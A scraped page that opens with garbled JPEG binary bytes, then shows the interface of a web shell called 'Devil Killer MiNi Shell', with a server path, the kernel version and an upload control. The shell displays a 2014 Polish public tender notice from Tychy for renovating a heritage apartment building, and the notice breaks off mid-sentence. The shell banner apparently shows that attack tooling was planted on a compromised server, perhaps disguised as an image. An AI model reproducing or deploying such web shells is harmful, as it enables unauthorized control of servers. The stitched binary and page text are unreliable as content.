JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140429/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140429/145442-N-2014.html

<p class="kh_header"><b>Tychy: Wykonanie robót budowlanych w ramach zadania inwestycyjnego pn.:  
     Rewitalizacja nieruchomości osiedla  A  z rekonstrukcją elementów architektury 
     socrealistycznej -  Plac Św. Anny 6-6a.</b><br>
<b>Numer ogłoszenia: 145442 - 2014; data zamieszczenia: 29.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w ramach zadania inwestycyjnego pn.:  
     Rewitalizacja nieruchomości osiedla  A  z rekonstrukcją elementów architektury 
     socrealistycznej -  Plac Św. Anny 6-6a..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie przez Wykonawcę robót budowlanych 
    dotyczących rewitalizacji budynku mieszkalnego  wielorodzinnego Wspólnoty Mieszkaniowej 
    Nr 23/I w Tychach przy Pl. Św. Anny 6-6a - na podstawie projektu architektoniczno - 
    budowlanego w ramach zadania inwestycyjnego pn.: Rewitalizacja nieruchomości osiedla
    A z rekonstrukcją elementów architektury socrealistycznej -Plac Św. Anny 6-6a. 

    Budynek objęty jest ochroną konserwatorską (gminna ewidencja zabytków).



2.	Zakres zamówienia obejmuje: 
1)	  ocieplenie ścian zewnętrznych tynkami renowacyjnymi wraz z przygotowaniem podłoża
      i odtworzeniem istniejących detali architektonicznych        
2)	   wymiana obróbek blacharskich, pionów spustowych, rynien, krat
3)	   ocieplenie stropodachu
4)	ocieplenie stropu nad piwnicą
5)	   wykonanie izolacji ścian fundamentowych
6)	   wykonanie robót towarzyszących
3.	Szczegółowy zakres robót określa przedmiar robót stanowiący załącznik do SIWZ. 
4.	Zamawiający dopuszcza zastosowanie materiałów innych - tzw. równoważnych o 
     parametrach i właściwościach nie gorszych niż wskazane w dokumentacji projektowej
     i przedmiarze robót stanowiących integralną część SIWZ, tj. takich które warunkują 
     zrealizowanie przedmiotu zamówienia zgodnie z zatwierdzoną dokumentacją projektową.
     Zastosowane materiały winny posiadać właściwości fizyczne (m.in. ciężar, objętość, 
     ciśnienie, właściwości cieplne itp.), cechy geometryczne oraz kolorystykę zgodną 
     z materiałami zastosowanymi w dokumentacji projektowej. Jeżeli wykonawca przewidzi 
     w ofercie zastosowanie materiałów równoważnych, na wykonawcy ciąży obowiązek 
     udowodnienia ich równoważności. Brak jednoznacznego wskazania w ofercie materiałów 
     równoważnych oznaczać będzie wykonanie przedmiotu zamówienia z zastosowaniem 
     materiałów wskazanych w załączonych do SIWZ dokumentów.
5.	Wykonawca zobowiązany jest do:         
1)   uzyskania  pozwolenia od Miejskiego Zarządu Ulic i Mostów ( MZUiM) w Tychach na
         zajęcie pasa drogowego w obszarze budynku przy Pl. Św. Anny 6 -6a w Tychach
                        2)   opracowania projektu tymczasowej zmiany organizacji ruchu dla potrzeb budowy 
                              wraz z uzgodnieniem dokumentacji z Wydziałem Komunikacji Urzędu Miasta Tychy,  
                              Komendą Policji w Tychach oraz Miejskim Zarządem Ulic i Mostów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.44.30.00-4, 45.32.00.00-6, 45.41.00.00-4, 45.26.25.22-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości       19 500,00 zł (słownie:  dziewiętnaście tysięcy pięćset złotych) - na czas związania ofertą.
2.	Wadium musi być wniesione przed upływem terminu składania ofert.
3.	Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę przetargu.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
Bank PKO S.A.  o / Tychy
Nr rachunku bankowego: 71 1020 2528 0000 0202 0267 3846
Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,                    
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 , z późn. zm.).
5.	W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia   wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4), natomiast kopię dowodu wniesienia wadium należy załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania 
         wiedzy i doświadczenia (art. 22 ust. 1 pkt 2 ustawy - PZP), Zamawiający wymaga 
         złożenia następujących dokumentów: 
   1)   wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem 
         terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym                 
         okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz                 
         załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te
         zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie 
         z zasadami sztuki budowlanej i prawidłowo ukończone.
         Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że wykonał                
         z należytą starannością:

   a)  co najmniej dwie roboty budowlane zrealizowane w zamieszkałych budynkach lub 
        funkcjonujących budynkach użyteczności publicznej - wpisanych do rejestru zabytków 
        lub  gminnej ewidencji zabytków obejmujące swym zakresem wykonanie remontu lub  
        rewitalizacji elewacji, które są tożsame z technologią remontu  opisaną w projekcie  
        technicznym polegające na: wykonaniu tynków termoizolacyjnych (ciepłochronnych) o  
        powierzchni elewacji nie mniejszej niż 750,00 m2 wraz z wykonaniem rekonstrukcji 
        (konserwacji) detali architektonicznych jako technicznej funkcjonalnej całości ściśle 
        powiązanej z wykonywaniem tynków np. gzymsy, bonie, ryzality itp.   lub stanowiącą 
        odrębną całość np. wykonanie konserwacji rzeźb lub płaskorzeźb (roboty winny dotyczyć 
        dwóch nieruchomości i być przedmiotem dwóch odrębnych umów), o wartości 
         nie mniejszej niż 357 000,00 zł (brutto)-  każda z robót. 
        lub
    b) co najmniej jedną robotę budowlaną zrealizowaną w zamieszkałym budynku lub  
         w funkcjonującym budynku użyteczności publicznej - wpisanym do rejestru zabytków 
         lub gminnej ewidencji zabytków, obejmującą swym zakresem wykonanie remontu lub 
         rewitalizacji elewacji, która jest tożsama z technologią remontu opisaną w projekcie  
         technicznym polegające na: wykonaniu tynków termoizolacyjnych (ciepłochronnych) 
         o powierzchni elewacji nie mniejszej niż 1 500,00 m2 wraz z wykonaniem rekonstrukcji 
         (konserwacji) detali architektonicznych jako technicznej funkcjonalnej całości ściśle 
         powiązanej z wykonywaniem tynków np. gzymsy, bonie, ryzality itp. lub stanowiącą 
         odrębną całość np. wykonanie konserwacji rzeźb lub płaskorzeźb  (robota winna być 
         zrealizowana na jednej nieruchomości), o wartości nie mniejszej niż 714 000 zł (brutto)  

         Uwaga dot. pkt. 1a) i 1b):
         Mając na względzie zachowanie szczególnych walorów architektury socrealistycznej   
         nieruchomości osiedla A oraz uzyskanie jak najlepszych efektów izolacyjności cieplnej  
         wykonanej warstwy elewacyjnej Zamawiający wymaga od Wykonawcy posiadania 
         specjalistycznej wiedzy w zakresie wykonywania tynków ciepłochronnych dlatego też 
         Zamawiający nie uzna wykonania robót elewacyjnych polegających na: 
         ociepleniu ścian z zastosowaniem styropianu jako izolacji termicznej, piaskowaniu, 
         czyszczeniu ręcznym lub mechanicznym elewacji.  

 2)  Do wykazu należy dołączyć dowody określające, czy roboty te zostały wykonane w 
      sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki 
      budowlanej i prawidłowo ukończone.
             Dowodami , o których mowa powyżej są:
    a)  poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych 
         lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed 
    upływem terminu składania ofert.

    b)  w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych 
         przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać 
         poświadczenia, o którym mowa w pkt 2a)

    c)  w przypadku zamówień na dostawy lub usługi - oświadczenie wykonawcy - jeżeli 
         z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie 
   uzyskać poświadczenia, o którym mowa w pkt 2a)

         Wykaz wykonanych robót budowlanych należy sporządzić wg wzoru druku stanowiącego 
         załącznik nr 3 do SIWZ.
         (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą 
          spełniać łącznie  lub co najmniej jeden z wykonawców).       

   1.2.1   W przypadku, gdy zamawiający jest podmiotem , na rzecz którego roboty wskazane w 
        wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania        
         poświadczeń , o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania
     osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP)        
       Zamawiający wymaga złożenia następujących dokumentów:

  1)  wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 
        odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami 
        budowlanymi , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
        i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
        przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.

         Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,   
        a w szczególności:
   a)  co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności 
        konstrukcyjno -budowlanej bez ograniczeń (kierownik budowy), z co najmniej 3 letnim 
         doświadczeniem 

b)	co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności 
        konstrukcyjno - budowlanej (lub równoważne), z co najmniej 3 letnim                 
        doświadczeniem, która wpisana jest na listę właściwej izby samorządu zawodowego oraz
        posiada kwalifikacje określone w § 24 rozporządzenia Ministra Kultury i Dziedzictwa 
        Narodowego z dnia 27.07.2011 r. w sprawie prowadzenia prac konserwatorskich, prac                     
        restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych 
        i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych 
        (Dz. U. z 2011 r. Nr 165, poz. 987),

c)	co najmniej  trzema osobami posiadającymi kwalifikacje w zawodzie tynkarz 
     z co najmniej 3 letnim doświadczeniem w tym zawodzie (każda z tych osób) 

    (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą spełniać 
     łącznie lub co najmniej jeden z wykonawców ). 

       Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik Nr 4 do SIWZ.

2)	 oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają 
       wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
       Oświadczenie należy sporządzić wg wzoru stanowiącego załącznik Nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.4.	W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania
      wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt  4 ustawy - PZP), 
      Zamawiający wymaga, złożenia następujących dokumentów: 
1)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej 
 wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy,   
 wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
 -  wymagane jest posiadanie środków finansowych lub zdolności kredytowej na kwotę
 nie mniejszą niż 700 000,00 zł.

2)	opłaconej polisy, a w przypadku jej braku , innego dokumentu potwierdzającego, że 
  wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
 działalności związanej z przedmiotem zamówienia 
 -  wymagane jest posiadanie ww. dokumentu o wartości ubezpieczenia nie mniejszej 
 niż 700 000,00 zł.
       Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia 
       musi wynikać z treści dokumentu.
       Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest

       ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
       związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty
       dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający 
       opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).


(W przypadku podmiotów występujących wspólnie powyższe warunki udziału określone pkt. 1) i 2) wykonawcy mogą spełniać  łącznie lub co najmniej jeden z wykonawców).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku stanowiącego załącznik nr 1 do SIWZ.
2)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
3)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
4)	dowód wniesienia wadium
5)	Kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1)	 zmian personalnych, adresowych, formy prawnej stron umowy;
2)	 zmiany osoby/osób odpowiedzialnych za realizację robót, o których mowa w § 4 umowy;
3)	 zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT;
4)	 zmiany terminu realizacji przedmiotu umowy, w następstwie:
a)	siły wyższej rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego                                 niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy               zachowaniu najwyższej staranności, a które uniemożliwia wykonawcy wykonanie jego zobowiązania w całości lub części;
W razie wystąpienia siły wyższej strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej;
b)	zmian będących następstwem okoliczności nie wynikających z winy wykonawcy, a które nie zostały przewidziane na etapie prowadzenia postępowania (np. wstrzymania prowadzenia robót na podstawie decyzji administracyjnych);
c)	wystąpienia zamówień dodatkowych nie objętych zamówieniem podstawowym, których   wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
